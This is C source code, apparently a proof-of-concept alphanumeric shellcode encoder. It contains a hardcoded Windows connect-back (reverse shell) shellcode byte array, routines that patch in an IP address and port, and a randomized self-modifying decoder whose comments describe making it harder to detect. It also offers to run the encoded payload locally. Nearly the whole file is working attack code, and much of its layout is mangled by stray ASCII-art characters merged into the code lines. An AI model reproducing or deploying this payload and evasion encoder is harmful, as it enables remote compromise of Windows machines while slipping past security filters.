// Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
// Author: hdm[at]metasploit.com
#ifdef CONNECT_BACK_SHELLCODE
#define OFFSET_IP_ADDRESS 154
#define OFFSET_TCP_PORT_NUMBER 159
#define IP_ADDRESS "127.0.0.1"
#define TCP_PORT_NUMBER 123
DWORD ip_address;
UCHAR shellcode[] =
"\xe8\x30\x00\x00\x00\x43\x4d\x44\x00\xe7\x79\xc6\x79\xec\xf9\xaa"
"\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x8e\x4e\x0e\xec\x7e\xd8\xe2"
"\x73\xad\xd9\x05\xce\x72\xfe\xb3\x16\x57\x53\x32\x5f\x33\x32\x2e"
"\x44\x4c\x4c\x00\x01\x5b\x54\x89\xe5\x89\x5d\x00\x6a\x30\x59\x64"
"\x8b\x01\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x0c\x8d\x57"
"\x24\x51\x52\xff\xd0\x89\xc3\x59\xeb\x10\x6a\x08\x5e\x01\xee\x6a"
"\x08\x59\x8b\x7d\x00\x80\xf9\x04\x74\xe4\x51\x53\xff\x34\x8f\xe8"
"\x83\x00\x00\x00\x59\x89\x04\x8e\xe2\xeb\x31\xff\x66\x81\xec\x90"
"\x01\x54\x68\x01\x01\x00\x00\xff\x55\x18\x57\x57\x57\x57\x47\x57"
"\x47\x57\xff\x55\x14\x89\xc3\x31\xff\x68"
"IPIP" // I.P. address
"\x68"
"PORT" // TCP port number
"\x89\xe1\x6a\x10\x51\x53\xff\x55\x10\x85\xc0\x75\x44\x8d\x3c\x24"
"\x31\xc0\x6a\x15\x59\xf3\xab\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d"
"\x89\x5c\x24\x48\x89\x5c\x24\x4c\x89\x5c\x24\x50\x8d\x44\x24\x10"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75\x00\x51\xff\x55"
"\x28\x89\xe1\x68\xff\xff\xff\xff\xff\x31\xff\x55\x24\x57\xff\x55"
"\x0c\xff\x55\x20\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c\x8b"
"\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32\x49"
"\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07\xc1"
"\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24\x01"
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\xeb"
"\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";
#else
UCHAR shellcode[] = "\xCC YOUR SHELLCODE GOES HERE \xCC"; // <----------------- here
#endif

DWORD size = sizeof(shellcode)-1;

int main()
{
    //(decoder address is in ecx when decoder starts)
    UCHAR PUSH_REGISTER_WITH_DECODER_ADDRESS = get_push_register_instruction(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE));

    #define END_OF_ENCODED_SHELLCODE 'A','L','D','N' // this is the terminating string of the encoded shellcode
    UCHAR str_end_of_encoded_shellcode[] = {END_OF_ENCODED_SHELLCODE};

    UCHAR xor_al1 = get_random_alnum_value(); // this is used to zero out AL the first time
    UCHAR xor_al2 = get_random_alnum_value(); // this is used to zero out AL the second time

    int offset_imul_key = '\xC1';
    int jne_xor1 = '\xC2';
    int jne_xor2 = '\xC3';
    // you would need to play with these two values if you want to reduce
    // the size of the NOP slides - they obviously need to stay alnum.
    // You could also play with the value of AL before the XOR is done
    // to get your desired negative offset. keep in mind that it will cost
    // you instructions to get al to the value you want (if you use xor of
    // two alphanumeric bytes, you would need to push first alphanumeric
    // char to the stack, pop eax, then xor it with its alnum complement)
    // This playing around would result in an even harder to detect decoder
    // as the offsets would be different

    int size_decoder = '\xC4';
    int half_size_decoder = '\xC5';

    UCHAR imul_instruction_1 = '\x6B';
    UCHAR imul_instruction_2 = '\x41';
    UCHAR imul_instruction_3 = '\xC6'; //size of decoder+1
    UCHAR imul_instruction_4 = '\xC7'; //initial key (random alnum)

    UINT column = 0, i = 0;
    UCHAR *alnum = ALNUM_CHARSET;
    UCHAR *p_alnum = alnum;

    UCHAR decoder[] =
    {
        //[step_1] -- multiply first encoded byte with key
        //[step_2] -- xor result of step_1 with second encoded byte to get the decoded byte
        //
        // Each binary byte is encoded into three alphanumeric bytes.
        // The first byte multiplied by the third byte xor'ed against the second byte yields the original
        // binary byte.
        //
        // TODO:
        // .--(first byte ^ second byte) * third byte
        // '--(second byte ^ first byte) * third byte
        //
        // .--(first byte ^ third byte) * second byte
        // '--(third byte ^ first byte) * second byte
        //
        // .--(second byte ^ third byte) * first byte
        // '--(third byte ^ second byte) * first byte
        //
        // .--(first byte * second byte) ^ third byte
        // '--(second byte * first byte) ^ third byte
        //
        // .--(first byte * third byte) ^ second byte <-- decoder/encoder implemented
        // '--(third byte * first byte) ^ second byte <-- decoder implemented (same encoder)
        //
        // .--(second byte * third byte) ^ first byte
        // '--(third byte * second byte) ^ first byte
        //
        // The above is divided into pairs, each pair has the same values (in parenthesis) just at different offsets,
        // and we can switch them around with no effect. Each option requires a different decoder, but each pair can use the
        // same encoder.
        //
        /////////// DECODER HEAD (will be randomized by sliding instructions) ////////
        /* 1*/ '\x50',                               //push ??? (this can change)      // [eax = address of decoder]
        /* 2*/ '\x50',                               //push ??? (this can change)      // [ecx = address of decoder]
        /* 3*/ PUSH_REGISTER_WITH_DECODER_ADDRESS,   //push reg (decoder address)      // [edx = address of decoder]
        /* 4*/ PUSH_REGISTER_WITH_DECODER_ADDRESS,   //push reg (base offset for cmp)  // [ebx = address of decoder]
        /* 5*/ '\x50',                               //push ??? (this can change)      // [esp = address of decoder]
        /* 7*/ '\x6A', half_size_decoder,            //push 35h (word offset for cmp)  // [ebp = decoder size / 2]
        /*12*/ '\x68', END_OF_ENCODED_SHELLCODE,     //push END_OF_ENCODED_SHELLCODE   // [esi = 4 bytes terminating key]
        /*13*/ '\x50',                               //push ??? (this can change)      // [edi = address of decoder]
        /*14*/ '\x61',                               //popad                           // [set all registers]
        /*16*/ '\x6A', xor_al1,                      //last decoder byte=0xB1 //push XOR_AL1 [JNE_XOR1^0xFF=al^JNE_XOR2=last byte==0xB1]
        /*17*/ '\x58',                               //pop eax
        /*19*/ '\x34', xor_al1,                      //xor al,XOR_AL1 [al = 0x00]
        /*20*/ '\x48',                               //dec eax [al = 0xFF] [you can play with AL here...]
        /*22*/ '\x34', jne_xor1,                     //xor al,JNE_XOR1 [al = 0xFF ^ JNE_XOR1]
        /*25*/ '\x30', '\x42', size_decoder-1,       //xor byte ptr [edx+size],al (changes the last decoder byte)
        /*26*/ '\x52',                               //push edx [save decoder address on stack]
        /*27*/ '\x52',                               //push edx
        /*28*/ '\x59',                               //pop ecx [ecx = address of decoder]
        /*29*/ '\x47',                               //inc edi    we increment ebx keeping the decoder
        /*30*/ '\x43',                               //inc ebx    length non-even (edi is unused)
        //////////////// DECODER_LOOP_START ///////////////////////////////////////////
        /*31*/ '\x58',                               //get address of the decoder  //pop eax
        /*32*/ '\x52',                               //save edx                    //push edx [can use edx now]
        /*33*/ '\x51',                               //save ecx                    //push ecx [can use ecx now]
        /*34*/ '\x50',                               //save address of decoder     //push eax [can use eax now]
        /*35*/ '\x50',                               //save eax                    //push eax
        /*36*/ '\x5A',                               //restore into edx            //pop edx
        /*38*/ '\x6A', xor_al2,                      //zero out al                 //push XOR_AL2 [al = 0]
        /*39*/ '\x58',                               //zero out al                 //pop eax
        /*41*/ '\x34', xor_al2,                      //zero out al                 //xor al,XOR_AL2
        /*42*/ '\x50',                               //save al on the stack (al=0) //push eax
| | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec 
esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. 
| | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. 
| | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). 
| | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 
= 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | 
decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | 
*(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | 
////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | 
///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. 
running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = 
scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else 
if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... 
